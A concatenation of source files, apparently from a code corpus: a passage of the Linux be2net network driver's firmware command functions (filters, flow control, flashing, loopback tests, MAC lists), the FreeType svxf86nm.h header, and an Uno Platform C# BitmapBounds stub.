} status = be_mcc_notify_wait(adapter); err: spin_unlock_bh(&adapter->mcc_lock); return status; } int be_cmd_rx_filter(struct be_adapter *adapter, u32 flags, u32 value) { struct be_mcc_wrb *wrb; struct be_dma_mem *mem = &adapter->rx_filter; struct be_cmd_req_rx_filter *req = mem->va; int status; spin_lock_bh(&adapter->mcc_lock); wrb = wrb_from_mccq(adapter); if (!wrb) { status = -EBUSY; goto err; } memset(req, 0, sizeof(*req)); be_wrb_cmd_hdr_prepare(&req->hdr, CMD_SUBSYSTEM_COMMON, OPCODE_COMMON_NTWK_RX_FILTER, sizeof(*req), wrb, mem); req->if_id = cpu_to_le32(adapter->if_handle); if (flags & IFF_PROMISC) { req->if_flags_mask = cpu_to_le32(BE_IF_FLAGS_PROMISCUOUS | BE_IF_FLAGS_VLAN_PROMISCUOUS); if (value == ON) req->if_flags = cpu_to_le32(BE_IF_FLAGS_PROMISCUOUS | BE_IF_FLAGS_VLAN_PROMISCUOUS); } else if (flags & IFF_ALLMULTI) { req->if_flags_mask = req->if_flags = cpu_to_le32(BE_IF_FLAGS_MCAST_PROMISCUOUS); } else { struct netdev_hw_addr *ha; int i = 0; req->if_flags_mask = req->if_flags = cpu_to_le32(BE_IF_FLAGS_MULTICAST); /* Reset mcast promisc mode if already set by setting mask * and not setting flags field */ req->if_flags_mask |= cpu_to_le32(BE_IF_FLAGS_MCAST_PROMISCUOUS); req->mcast_num = cpu_to_le32(netdev_mc_count(adapter->netdev)); netdev_for_each_mc_addr(ha, adapter->netdev) memcpy(req->mcast_mac[i++].byte, ha->addr, ETH_ALEN); } status = be_mcc_notify_wait(adapter); err: spin_unlock_bh(&adapter->mcc_lock); return status; } /* Uses synchrounous mcc */ int be_cmd_set_flow_control(struct be_adapter *adapter, u32 tx_fc, u32 rx_fc) { struct be_mcc_wrb *wrb; struct be_cmd_req_set_flow_control *req; int status; spin_lock_bh(&adapter->mcc_lock); wrb = wrb_from_mccq(adapter); if (!wrb) { status = -EBUSY; goto err; } req = embedded_payload(wrb); be_wrb_cmd_hdr_prepare(&req->hdr, CMD_SUBSYSTEM_COMMON, OPCODE_COMMON_SET_FLOW_CONTROL, sizeof(*req), wrb, NULL); req->tx_flow_control = cpu_to_le16((u16)tx_fc); req->rx_flow_control = cpu_to_le16((u16)rx_fc); status 
= be_mcc_notify_wait(adapter); err: spin_unlock_bh(&adapter->mcc_lock); return status; } /* Uses sycn mcc */ int be_cmd_get_flow_control(struct be_adapter *adapter, u32 *tx_fc, u32 *rx_fc) { struct be_mcc_wrb *wrb; struct be_cmd_req_get_flow_control *req; int status; spin_lock_bh(&adapter->mcc_lock); wrb = wrb_from_mccq(adapter); if (!wrb) { status = -EBUSY; goto err; } req = embedded_payload(wrb); be_wrb_cmd_hdr_prepare(&req->hdr, CMD_SUBSYSTEM_COMMON, OPCODE_COMMON_GET_FLOW_CONTROL, sizeof(*req), wrb, NULL); status = be_mcc_notify_wait(adapter); if (!status) { struct be_cmd_resp_get_flow_control *resp = embedded_payload(wrb); *tx_fc = le16_to_cpu(resp->tx_flow_control); *rx_fc = le16_to_cpu(resp->rx_flow_control); } err: spin_unlock_bh(&adapter->mcc_lock); return status; } /* Uses mbox */ int be_cmd_query_fw_cfg(struct be_adapter *adapter, u32 *port_num, u32 *mode, u32 *caps) { struct be_mcc_wrb *wrb; struct be_cmd_req_query_fw_cfg *req; int status; if (mutex_lock_interruptible(&adapter->mbox_lock)) return -1; wrb = wrb_from_mbox(adapter); req = embedded_payload(wrb); be_wrb_cmd_hdr_prepare(&req->hdr, CMD_SUBSYSTEM_COMMON, OPCODE_COMMON_QUERY_FIRMWARE_CONFIG, sizeof(*req), wrb, NULL); status = be_mbox_notify_wait(adapter); if (!status) { struct be_cmd_resp_query_fw_cfg *resp = embedded_payload(wrb); *port_num = le32_to_cpu(resp->phys_port); *mode = le32_to_cpu(resp->function_mode); *caps = le32_to_cpu(resp->function_caps); } mutex_unlock(&adapter->mbox_lock); return status; } /* Uses mbox */ int be_cmd_reset_function(struct be_adapter *adapter) { struct be_mcc_wrb *wrb; struct be_cmd_req_hdr *req; int status; if (mutex_lock_interruptible(&adapter->mbox_lock)) return -1; wrb = wrb_from_mbox(adapter); req = embedded_payload(wrb); be_wrb_cmd_hdr_prepare(req, CMD_SUBSYSTEM_COMMON, OPCODE_COMMON_FUNCTION_RESET, sizeof(*req), wrb, NULL); status = be_mbox_notify_wait(adapter); mutex_unlock(&adapter->mbox_lock); return status; } int be_cmd_rss_config(struct be_adapter 
*adapter, u8 *rsstable, u16 table_size) { struct be_mcc_wrb *wrb; struct be_cmd_req_rss_config *req; u32 myhash[10] = {0x15d43fa5, 0x2534685a, 0x5f87693a, 0x5668494e, 0x33cf6a53, 0x383334c6, 0x76ac4257, 0x59b242b2, 0x3ea83c02, 0x4a110304}; int status; if (mutex_lock_interruptible(&adapter->mbox_lock)) return -1; wrb = wrb_from_mbox(adapter); req = embedded_payload(wrb); be_wrb_cmd_hdr_prepare(&req->hdr, CMD_SUBSYSTEM_ETH, OPCODE_ETH_RSS_CONFIG, sizeof(*req), wrb, NULL); req->if_id = cpu_to_le32(adapter->if_handle); req->enable_rss = cpu_to_le16(RSS_ENABLE_TCP_IPV4 | RSS_ENABLE_IPV4 | RSS_ENABLE_TCP_IPV6 | RSS_ENABLE_IPV6); req->cpu_table_size_log2 = cpu_to_le16(fls(table_size) - 1); memcpy(req->cpu_table, rsstable, table_size); memcpy(req->hash, myhash, sizeof(myhash)); be_dws_cpu_to_le(req->hash, sizeof(req->hash)); status = be_mbox_notify_wait(adapter); mutex_unlock(&adapter->mbox_lock); return status; } /* Uses sync mcc */ int be_cmd_set_beacon_state(struct be_adapter *adapter, u8 port_num, u8 bcn, u8 sts, u8 state) { struct be_mcc_wrb *wrb; struct be_cmd_req_enable_disable_beacon *req; int status; spin_lock_bh(&adapter->mcc_lock); wrb = wrb_from_mccq(adapter); if (!wrb) { status = -EBUSY; goto err; } req = embedded_payload(wrb); be_wrb_cmd_hdr_prepare(&req->hdr, CMD_SUBSYSTEM_COMMON, OPCODE_COMMON_ENABLE_DISABLE_BEACON, sizeof(*req), wrb, NULL); req->port_num = port_num; req->beacon_state = state; req->beacon_duration = bcn; req->status_duration = sts; status = be_mcc_notify_wait(adapter); err: spin_unlock_bh(&adapter->mcc_lock); return status; } /* Uses sync mcc */ int be_cmd_get_beacon_state(struct be_adapter *adapter, u8 port_num, u32 *state) { struct be_mcc_wrb *wrb; struct be_cmd_req_get_beacon_state *req; int status; spin_lock_bh(&adapter->mcc_lock); wrb = wrb_from_mccq(adapter); if (!wrb) { status = -EBUSY; goto err; } req = embedded_payload(wrb); be_wrb_cmd_hdr_prepare(&req->hdr, CMD_SUBSYSTEM_COMMON, OPCODE_COMMON_GET_BEACON_STATE, sizeof(*req), wrb, 
NULL); req->port_num = port_num; status = be_mcc_notify_wait(adapter); if (!status) { struct be_cmd_resp_get_beacon_state *resp = embedded_payload(wrb); *state = resp->beacon_state; } err: spin_unlock_bh(&adapter->mcc_lock); return status; } int lancer_cmd_write_object(struct be_adapter *adapter, struct be_dma_mem *cmd, u32 data_size, u32 data_offset, const char *obj_name, u32 *data_written, u8 *addn_status) { struct be_mcc_wrb *wrb; struct lancer_cmd_req_write_object *req; struct lancer_cmd_resp_write_object *resp; void *ctxt = NULL; int status; spin_lock_bh(&adapter->mcc_lock); adapter->flash_status = 0; wrb = wrb_from_mccq(adapter); if (!wrb) { status = -EBUSY; goto err_unlock; } req = embedded_payload(wrb); be_wrb_cmd_hdr_prepare(&req->hdr, CMD_SUBSYSTEM_COMMON, OPCODE_COMMON_WRITE_OBJECT, sizeof(struct lancer_cmd_req_write_object), wrb, NULL); ctxt = &req->context; AMAP_SET_BITS(struct amap_lancer_write_obj_context, write_length, ctxt, data_size); if (data_size == 0) AMAP_SET_BITS(struct amap_lancer_write_obj_context, eof, ctxt, 1); else AMAP_SET_BITS(struct amap_lancer_write_obj_context, eof, ctxt, 0); be_dws_cpu_to_le(ctxt, sizeof(req->context)); req->write_offset = cpu_to_le32(data_offset); strcpy(req->object_name, obj_name); req->descriptor_count = cpu_to_le32(1); req->buf_len = cpu_to_le32(data_size); req->addr_low = cpu_to_le32((cmd->dma + sizeof(struct lancer_cmd_req_write_object)) & 0xFFFFFFFF); req->addr_high = cpu_to_le32(upper_32_bits(cmd->dma + sizeof(struct lancer_cmd_req_write_object))); be_mcc_notify(adapter); spin_unlock_bh(&adapter->mcc_lock); if (!wait_for_completion_timeout(&adapter->flash_compl, msecs_to_jiffies(12000))) status = -1; else status = adapter->flash_status; resp = embedded_payload(wrb); if (!status) { *data_written = le32_to_cpu(resp->actual_write_len); } else { *addn_status = resp->additional_status; status = resp->status; } return status; err_unlock: spin_unlock_bh(&adapter->mcc_lock); return status; } int 
lancer_cmd_read_object(struct be_adapter *adapter, struct be_dma_mem *cmd, u32 data_size, u32 data_offset, const char *obj_name, u32 *data_read, u32 *eof, u8 *addn_status) { struct be_mcc_wrb *wrb; struct lancer_cmd_req_read_object *req; struct lancer_cmd_resp_read_object *resp; int status; spin_lock_bh(&adapter->mcc_lock); wrb = wrb_from_mccq(adapter); if (!wrb) { status = -EBUSY; goto err_unlock; } req = embedded_payload(wrb); be_wrb_cmd_hdr_prepare(&req->hdr, CMD_SUBSYSTEM_COMMON, OPCODE_COMMON_READ_OBJECT, sizeof(struct lancer_cmd_req_read_object), wrb, NULL); req->desired_read_len = cpu_to_le32(data_size); req->read_offset = cpu_to_le32(data_offset); strcpy(req->object_name, obj_name); req->descriptor_count = cpu_to_le32(1); req->buf_len = cpu_to_le32(data_size); req->addr_low = cpu_to_le32((cmd->dma & 0xFFFFFFFF)); req->addr_high = cpu_to_le32(upper_32_bits(cmd->dma)); status = be_mcc_notify_wait(adapter); resp = embedded_payload(wrb); if (!status) { *data_read = le32_to_cpu(resp->actual_read_len); *eof = le32_to_cpu(resp->eof); } else { *addn_status = resp->additional_status; } err_unlock: spin_unlock_bh(&adapter->mcc_lock); return status; } int be_cmd_write_flashrom(struct be_adapter *adapter, struct be_dma_mem *cmd, u32 flash_type, u32 flash_opcode, u32 buf_size) { struct be_mcc_wrb *wrb; struct be_cmd_write_flashrom *req; int status; spin_lock_bh(&adapter->mcc_lock); adapter->flash_status = 0; wrb = wrb_from_mccq(adapter); if (!wrb) { status = -EBUSY; goto err_unlock; } req = cmd->va; be_wrb_cmd_hdr_prepare(&req->hdr, CMD_SUBSYSTEM_COMMON, OPCODE_COMMON_WRITE_FLASHROM, cmd->size, wrb, cmd); req->params.op_type = cpu_to_le32(flash_type); req->params.op_code = cpu_to_le32(flash_opcode); req->params.data_buf_size = cpu_to_le32(buf_size); be_mcc_notify(adapter); spin_unlock_bh(&adapter->mcc_lock); if (!wait_for_completion_timeout(&adapter->flash_compl, msecs_to_jiffies(40000))) status = -1; else status = adapter->flash_status; return status; err_unlock: 
spin_unlock_bh(&adapter->mcc_lock); return status; } int be_cmd_get_flash_crc(struct be_adapter *adapter, u8 *flashed_crc, int offset) { struct be_mcc_wrb *wrb; struct be_cmd_write_flashrom *req; int status; spin_lock_bh(&adapter->mcc_lock); wrb = wrb_from_mccq(adapter); if (!wrb) { status = -EBUSY; goto err; } req = embedded_payload(wrb); be_wrb_cmd_hdr_prepare(&req->hdr, CMD_SUBSYSTEM_COMMON, OPCODE_COMMON_READ_FLASHROM, sizeof(*req)+4, wrb, NULL); req->params.op_type = cpu_to_le32(IMG_TYPE_REDBOOT); req->params.op_code = cpu_to_le32(FLASHROM_OPER_REPORT); req->params.offset = cpu_to_le32(offset); req->params.data_buf_size = cpu_to_le32(0x4); status = be_mcc_notify_wait(adapter); if (!status) memcpy(flashed_crc, req->params.data_buf, 4); err: spin_unlock_bh(&adapter->mcc_lock); return status; } int be_cmd_enable_magic_wol(struct be_adapter *adapter, u8 *mac, struct be_dma_mem *nonemb_cmd) { struct be_mcc_wrb *wrb; struct be_cmd_req_acpi_wol_magic_config *req; int status; spin_lock_bh(&adapter->mcc_lock); wrb = wrb_from_mccq(adapter); if (!wrb) { status = -EBUSY; goto err; } req = nonemb_cmd->va; be_wrb_cmd_hdr_prepare(&req->hdr, CMD_SUBSYSTEM_ETH, OPCODE_ETH_ACPI_WOL_MAGIC_CONFIG, sizeof(*req), wrb, nonemb_cmd); memcpy(req->magic_mac, mac, ETH_ALEN); status = be_mcc_notify_wait(adapter); err: spin_unlock_bh(&adapter->mcc_lock); return status; } int be_cmd_set_loopback(struct be_adapter *adapter, u8 port_num, u8 loopback_type, u8 enable) { struct be_mcc_wrb *wrb; struct be_cmd_req_set_lmode *req; int status; spin_lock_bh(&adapter->mcc_lock); wrb = wrb_from_mccq(adapter); if (!wrb) { status = -EBUSY; goto err; } req = embedded_payload(wrb); be_wrb_cmd_hdr_prepare(&req->hdr, CMD_SUBSYSTEM_LOWLEVEL, OPCODE_LOWLEVEL_SET_LOOPBACK_MODE, sizeof(*req), wrb, NULL); req->src_port = port_num; req->dest_port = port_num; req->loopback_type = loopback_type; req->loopback_state = enable; status = be_mcc_notify_wait(adapter); err: spin_unlock_bh(&adapter->mcc_lock); return 
status; } int be_cmd_loopback_test(struct be_adapter *adapter, u32 port_num, u32 loopback_type, u32 pkt_size, u32 num_pkts, u64 pattern) { struct be_mcc_wrb *wrb; struct be_cmd_req_loopback_test *req; int status; spin_lock_bh(&adapter->mcc_lock); wrb = wrb_from_mccq(adapter); if (!wrb) { status = -EBUSY; goto err; } req = embedded_payload(wrb); be_wrb_cmd_hdr_prepare(&req->hdr, CMD_SUBSYSTEM_LOWLEVEL, OPCODE_LOWLEVEL_LOOPBACK_TEST, sizeof(*req), wrb, NULL); req->hdr.timeout = cpu_to_le32(4); req->pattern = cpu_to_le64(pattern); req->src_port = cpu_to_le32(port_num); req->dest_port = cpu_to_le32(port_num); req->pkt_size = cpu_to_le32(pkt_size); req->num_pkts = cpu_to_le32(num_pkts); req->loopback_type = cpu_to_le32(loopback_type); status = be_mcc_notify_wait(adapter); if (!status) { struct be_cmd_resp_loopback_test *resp = embedded_payload(wrb); status = le32_to_cpu(resp->status); } err: spin_unlock_bh(&adapter->mcc_lock); return status; } int be_cmd_ddr_dma_test(struct be_adapter *adapter, u64 pattern, u32 byte_cnt, struct be_dma_mem *cmd) { struct be_mcc_wrb *wrb; struct be_cmd_req_ddrdma_test *req; int status; int i, j = 0; spin_lock_bh(&adapter->mcc_lock); wrb = wrb_from_mccq(adapter); if (!wrb) { status = -EBUSY; goto err; } req = cmd->va; be_wrb_cmd_hdr_prepare(&req->hdr, CMD_SUBSYSTEM_LOWLEVEL, OPCODE_LOWLEVEL_HOST_DDR_DMA, cmd->size, wrb, cmd); req->pattern = cpu_to_le64(pattern); req->byte_count = cpu_to_le32(byte_cnt); for (i = 0; i < byte_cnt; i++) { req->snd_buff[i] = (u8)(pattern >> (j*8)); j++; if (j > 7) j = 0; } status = be_mcc_notify_wait(adapter); if (!status) { struct be_cmd_resp_ddrdma_test *resp; resp = cmd->va; if ((memcmp(resp->rcv_buff, req->snd_buff, byte_cnt) != 0) || resp->snd_err) { status = -1; } } err: spin_unlock_bh(&adapter->mcc_lock); return status; } int be_cmd_get_seeprom_data(struct be_adapter *adapter, struct be_dma_mem *nonemb_cmd) { struct be_mcc_wrb *wrb; struct be_cmd_req_seeprom_read *req; struct be_sge *sge; int status; 
spin_lock_bh(&adapter->mcc_lock); wrb = wrb_from_mccq(adapter); if (!wrb) { status = -EBUSY; goto err; } req = nonemb_cmd->va; sge = nonembedded_sgl(wrb); be_wrb_cmd_hdr_prepare(&req->hdr, CMD_SUBSYSTEM_COMMON, OPCODE_COMMON_SEEPROM_READ, sizeof(*req), wrb, nonemb_cmd); status = be_mcc_notify_wait(adapter); err: spin_unlock_bh(&adapter->mcc_lock); return status; } int be_cmd_get_phy_info(struct be_adapter *adapter, struct be_phy_info *phy_info) { struct be_mcc_wrb *wrb; struct be_cmd_req_get_phy_info *req; struct be_dma_mem cmd; int status; spin_lock_bh(&adapter->mcc_lock); wrb = wrb_from_mccq(adapter); if (!wrb) { status = -EBUSY; goto err; } cmd.size = sizeof(struct be_cmd_req_get_phy_info); cmd.va = pci_alloc_consistent(adapter->pdev, cmd.size, &cmd.dma); if (!cmd.va) { dev_err(&adapter->pdev->dev, "Memory alloc failure\n"); status = -ENOMEM; goto err; } req = cmd.va; be_wrb_cmd_hdr_prepare(&req->hdr, CMD_SUBSYSTEM_COMMON, OPCODE_COMMON_GET_PHY_DETAILS, sizeof(*req), wrb, &cmd); status = be_mcc_notify_wait(adapter); if (!status) { struct be_phy_info *resp_phy_info = cmd.va + sizeof(struct be_cmd_req_hdr); phy_info->phy_type = le16_to_cpu(resp_phy_info->phy_type); phy_info->interface_type = le16_to_cpu(resp_phy_info->interface_type); } pci_free_consistent(adapter->pdev, cmd.size, cmd.va, cmd.dma); err: spin_unlock_bh(&adapter->mcc_lock); return status; } int be_cmd_set_qos(struct be_adapter *adapter, u32 bps, u32 domain) { struct be_mcc_wrb *wrb; struct be_cmd_req_set_qos *req; int status; spin_lock_bh(&adapter->mcc_lock); wrb = wrb_from_mccq(adapter); if (!wrb) { status = -EBUSY; goto err; } req = embedded_payload(wrb); be_wrb_cmd_hdr_prepare(&req->hdr, CMD_SUBSYSTEM_COMMON, OPCODE_COMMON_SET_QOS, sizeof(*req), wrb, NULL); req->hdr.domain = domain; req->valid_bits = cpu_to_le32(BE_QOS_BITS_NIC); req->max_bps_nic = cpu_to_le32(bps); status = be_mcc_notify_wait(adapter); err: spin_unlock_bh(&adapter->mcc_lock); return status; } int 
be_cmd_get_cntl_attributes(struct be_adapter *adapter) { struct be_mcc_wrb *wrb; struct be_cmd_req_cntl_attribs *req; struct be_cmd_resp_cntl_attribs *resp; int status; int payload_len = max(sizeof(*req), sizeof(*resp)); struct mgmt_controller_attrib *attribs; struct be_dma_mem attribs_cmd; memset(&attribs_cmd, 0, sizeof(struct be_dma_mem)); attribs_cmd.size = sizeof(struct be_cmd_resp_cntl_attribs); attribs_cmd.va = pci_alloc_consistent(adapter->pdev, attribs_cmd.size, &attribs_cmd.dma); if (!attribs_cmd.va) { dev_err(&adapter->pdev->dev, "Memory allocation failure\n"); return -ENOMEM; } if (mutex_lock_interruptible(&adapter->mbox_lock)) return -1; wrb = wrb_from_mbox(adapter); if (!wrb) { status = -EBUSY; goto err; } req = attribs_cmd.va; be_wrb_cmd_hdr_prepare(&req->hdr, CMD_SUBSYSTEM_COMMON, OPCODE_COMMON_GET_CNTL_ATTRIBUTES, payload_len, wrb, &attribs_cmd); status = be_mbox_notify_wait(adapter); if (!status) { attribs = attribs_cmd.va + sizeof(struct be_cmd_resp_hdr); adapter->hba_port_num = attribs->hba_attribs.phy_port; } err: mutex_unlock(&adapter->mbox_lock); pci_free_consistent(adapter->pdev, attribs_cmd.size, attribs_cmd.va, attribs_cmd.dma); return status; } /* Uses mbox */ int be_cmd_req_native_mode(struct be_adapter *adapter) { struct be_mcc_wrb *wrb; struct be_cmd_req_set_func_cap *req; int status; if (mutex_lock_interruptible(&adapter->mbox_lock)) return -1; wrb = wrb_from_mbox(adapter); if (!wrb) { status = -EBUSY; goto err; } req = embedded_payload(wrb); be_wrb_cmd_hdr_prepare(&req->hdr, CMD_SUBSYSTEM_COMMON, OPCODE_COMMON_SET_DRIVER_FUNCTION_CAP, sizeof(*req), wrb, NULL); req->valid_cap_flags = cpu_to_le32(CAPABILITY_SW_TIMESTAMPS | CAPABILITY_BE3_NATIVE_ERX_API); req->cap_flags = cpu_to_le32(CAPABILITY_BE3_NATIVE_ERX_API); status = be_mbox_notify_wait(adapter); if (!status) { struct be_cmd_resp_set_func_cap *resp = embedded_payload(wrb); adapter->be3_native = le32_to_cpu(resp->cap_flags) & CAPABILITY_BE3_NATIVE_ERX_API; } err: 
mutex_unlock(&adapter->mbox_lock); return status; } /* Uses synchronous MCCQ */ int be_cmd_get_mac_from_list(struct be_adapter *adapter, u32 domain, bool *pmac_id_active, u32 *pmac_id, u8 *mac) { struct be_mcc_wrb *wrb; struct be_cmd_req_get_mac_list *req; int status; int mac_count; struct be_dma_mem get_mac_list_cmd; int i; memset(&get_mac_list_cmd, 0, sizeof(struct be_dma_mem)); get_mac_list_cmd.size = sizeof(struct be_cmd_resp_get_mac_list); get_mac_list_cmd.va = pci_alloc_consistent(adapter->pdev, get_mac_list_cmd.size, &get_mac_list_cmd.dma); if (!get_mac_list_cmd.va) { dev_err(&adapter->pdev->dev, "Memory allocation failure during GET_MAC_LIST\n"); return -ENOMEM; } spin_lock_bh(&adapter->mcc_lock); wrb = wrb_from_mccq(adapter); if (!wrb) { status = -EBUSY; goto out; } req = get_mac_list_cmd.va; be_wrb_cmd_hdr_prepare(&req->hdr, CMD_SUBSYSTEM_COMMON, OPCODE_COMMON_GET_MAC_LIST, sizeof(*req), wrb, &get_mac_list_cmd); req->hdr.domain = domain; req->mac_type = MAC_ADDRESS_TYPE_NETWORK; req->perm_override = 1; status = be_mcc_notify_wait(adapter); if (!status) { struct be_cmd_resp_get_mac_list *resp = get_mac_list_cmd.va; mac_count = resp->true_mac_count + resp->pseudo_mac_count; /* Mac list returned could contain one or more active mac_ids * or one or more pseudo permanant mac addresses. 
If an active * mac_id is present, return first active mac_id found */ for (i = 0; i < mac_count; i++) { struct get_list_macaddr *mac_entry; u16 mac_addr_size; u32 mac_id; mac_entry = &resp->macaddr_list[i]; mac_addr_size = le16_to_cpu(mac_entry->mac_addr_size); /* mac_id is a 32 bit value and mac_addr size * is 6 bytes */ if (mac_addr_size == sizeof(u32)) { *pmac_id_active = true; mac_id = mac_entry->mac_addr_id.s_mac_id.mac_id; *pmac_id = le32_to_cpu(mac_id); goto out; } } /* If no active mac_id found, return first pseudo mac addr */ *pmac_id_active = false; memcpy(mac, resp->macaddr_list[0].mac_addr_id.macaddr, ETH_ALEN); } out: spin_unlock_bh(&adapter->mcc_lock); pci_free_consistent(adapter->pdev, get_mac_list_cmd.size, get_mac_list_cmd.va, get_mac_list_cmd.dma); return status; } /* Uses synchronous MCCQ */ int be_cmd_set_mac_list(struct be_adapter *adapter, u8 *mac_array, u8 mac_count, u32 domain) { struct be_mcc_wrb *wrb; struct be_cmd_req_set_mac_list *req; int status; struct be_dma_mem cmd; memset(&cmd, 0, sizeof(struct be_dma_mem)); cmd.size = sizeof(struct be_cmd_req_set_mac_list); cmd.va = dma_alloc_coherent(&adapter->pdev->dev, cmd.size, &cmd.dma, GFP_KERNEL); if (!cmd.va) { dev_err(&adapter->pdev->dev, "Memory alloc failure\n"); return -ENOMEM; } spin_lock_bh(&adapter->mcc_lock); wrb = wrb_from_mccq(adapter); if (!wrb) { status = -EBUSY; goto err; } req = cmd.va; be_wrb_cmd_hdr_prepare(&req->hdr, CMD_SUBSYSTEM_COMMON, OPCODE_COMMON_SET_MAC_LIST, sizeof(*req), wrb, &cmd); req->hdr.domain = domain; req->mac_count = mac_count; if (mac_count) memcpy(req->mac, mac_array, ETH_ALEN*mac_count); status = be_mcc_notify_wait(adapter); err: dma_free_coherent(&adapter->pdev->dev, cmd.size, cmd.va, cmd.dma); spin_unlock_bh(&adapter->mcc_lock); return status; } int be_cmd_set_hsw_config(struct be_adapter *adapter, u16 pvid, u32 domain, u16 intf_id) { struct be_mcc_wrb *wrb; struct be_cmd_req_set_hsw_config *req; void *ctxt; int status; 
spin_lock_bh(&adapter->mcc_lock); wrb = wrb_from_mccq(adapter); if (!wrb) { status = -EBUSY; goto err; } req = embedded_payload(wrb); ctxt = &req->context; be_wrb_cmd_hdr_prepare(&req->hdr, CMD_SUBSYSTEM_COMMON, OPCODE_COMMON_SET_HSW_CONFIG, sizeof(*req), wrb, NULL); req->hdr.domain = domain; AMAP_SET_BITS(struct amap_set_hsw_context, interface_id, ctxt, intf_id); if (pvid) { AMAP_SET_BITS(struct amap_set_hsw_context, pvid_valid, ctxt, 1); AMAP_SET_BITS(struct amap_set_hsw_context, pvid, ctxt, pvid); } be_dws_cpu_to_le(req->context, sizeof(req->context)); status = be_mcc_notify_wait(adapter); err: spin_unlock_bh(&adapter->mcc_lock); return status; } /* Get Hyper switch config */ int be_cmd_get_hsw_config(struct be_adapter *adapter, u16 *pvid, u32 domain, u16 intf_id) { struct be_mcc_wrb *wrb; struct be_cmd_req_get_hsw_config *req; void *ctxt; int status; u16 vid; spin_lock_bh(&adapter->mcc_lock); wrb = wrb_from_mccq(adapter); if (!wrb) { status = -EBUSY; goto err; } req = embedded_payload(wrb); ctxt = &req->context; be_wrb_cmd_hdr_prepare(&req->hdr, CMD_SUBSYSTEM_COMMON, OPCODE_COMMON_GET_HSW_CONFIG, sizeof(*req), wrb, NULL); req->hdr.domain = domain; AMAP_SET_BITS(struct amap_get_hsw_req_context, interface_id, ctxt, intf_id); AMAP_SET_BITS(struct amap_get_hsw_req_context, pvid_valid, ctxt, 1); be_dws_cpu_to_le(req->context, sizeof(req->context)); status = be_mcc_notify_wait(adapter); if (!status) { struct be_cmd_resp_get_hsw_config *resp = embedded_payload(wrb); be_dws_le_to_cpu(&resp->context, sizeof(resp->context)); vid = AMAP_GET_BITS(struct amap_get_hsw_resp_context, pvid, &resp->context); *pvid = le16_to_cpu(vid); } err: spin_unlock_bh(&adapter->mcc_lock); return status; } int be_cmd_get_acpi_wol_cap(struct be_adapter *adapter) { struct be_mcc_wrb *wrb; struct be_cmd_req_acpi_wol_magic_config_v1 *req; int status; int payload_len = sizeof(*req); struct be_dma_mem cmd; memset(&cmd, 0, sizeof(struct be_dma_mem)); cmd.size = sizeof(struct 
be_cmd_resp_acpi_wol_magic_config_v1); cmd.va = pci_alloc_consistent(adapter->pdev, cmd.size, &cmd.dma); if (!cmd.va) { dev_err(&adapter->pdev->dev, "Memory allocation failure\n"); return -ENOMEM; } if (mutex_lock_interruptible(&adapter->mbox_lock)) return -1; wrb = wrb_from_mbox(adapter); if (!wrb) { status = -EBUSY; goto err; } req = cmd.va; be_wrb_cmd_hdr_prepare(&req->hdr, CMD_SUBSYSTEM_ETH, OPCODE_ETH_ACPI_WOL_MAGIC_CONFIG, payload_len, wrb, &cmd); req->hdr.version = 1; req->query_options = BE_GET_WOL_CAP; status = be_mbox_notify_wait(adapter); if (!status) { struct be_cmd_resp_acpi_wol_magic_config_v1 *resp; resp = (struct be_cmd_resp_acpi_wol_magic_config_v1 *) cmd.va; /* the command could succeed misleadingly on old f/w * which is not aware of the V1 version. fake an error. */ if (resp->hdr.response_length < payload_len) { status = -1; goto err; } adapter->wol_cap = resp->wol_settings; } err: mutex_unlock(&adapter->mbox_lock); pci_free_consistent(adapter->pdev, cmd.size, cmd.va, cmd.dma); return status; }
{ "language": "C" }
/***************************************************************************/ /* */ /* svxf86nm.h */ /* */ /* The FreeType XFree86 services (specification only). */ /* */ /* Copyright 2003 by */ /* David Turner, Robert Wilhelm, and Werner Lemberg. */ /* */ /* This file is part of the FreeType project, and may only be used, */ /* modified, and distributed under the terms of the FreeType project */ /* license, LICENSE.TXT. By continuing to use, modify, or distribute */ /* this file you indicate that you have read the license and */ /* understand and accept it fully. */ /* */ /***************************************************************************/ #ifndef __SVXF86NM_H__ #define __SVXF86NM_H__ #include FT_INTERNAL_SERVICE_H FT_BEGIN_HEADER /* * A trivial service used to return the name of a face's font driver, * according to the XFree86 nomenclature. Note that the service data * is a simple constant string pointer. */ #define FT_SERVICE_ID_XF86_NAME "xf86-driver-name" #define FT_XF86_FORMAT_TRUETYPE "TrueType" #define FT_XF86_FORMAT_TYPE_1 "Type 1" #define FT_XF86_FORMAT_BDF "BDF" #define FT_XF86_FORMAT_PCF "PCF" #define FT_XF86_FORMAT_TYPE_42 "Type 42" #define FT_XF86_FORMAT_CID "CID Type 1" #define FT_XF86_FORMAT_CFF "CFF" #define FT_XF86_FORMAT_PFR "PFR" #define FT_XF86_FORMAT_WINFNT "Windows FNT" /* */ FT_END_HEADER #endif /* __SVXF86NM_H__ */ /* END */
{ "language": "C" }
#pragma warning disable 108 // new keyword hiding #pragma warning disable 114 // new keyword hiding namespace Windows.Graphics.Imaging { #if __ANDROID__ || __IOS__ || NET461 || __WASM__ || __SKIA__ || __NETSTD_REFERENCE__ || __MACOS__ [global::Uno.NotImplemented] #endif public partial struct BitmapBounds { // Forced skipping of method Windows.Graphics.Imaging.BitmapBounds.BitmapBounds() #if __ANDROID__ || __IOS__ || NET461 || __WASM__ || __SKIA__ || __NETSTD_REFERENCE__ || __MACOS__ public uint X; #endif #if __ANDROID__ || __IOS__ || NET461 || __WASM__ || __SKIA__ || __NETSTD_REFERENCE__ || __MACOS__ public uint Y; #endif #if __ANDROID__ || __IOS__ || NET461 || __WASM__ || __SKIA__ || __NETSTD_REFERENCE__ || __MACOS__ public uint Width; #endif #if __ANDROID__ || __IOS__ || NET461 || __WASM__ || __SKIA__ || __NETSTD_REFERENCE__ || __MACOS__ public uint Height; #endif } }
{ "language": "C" }
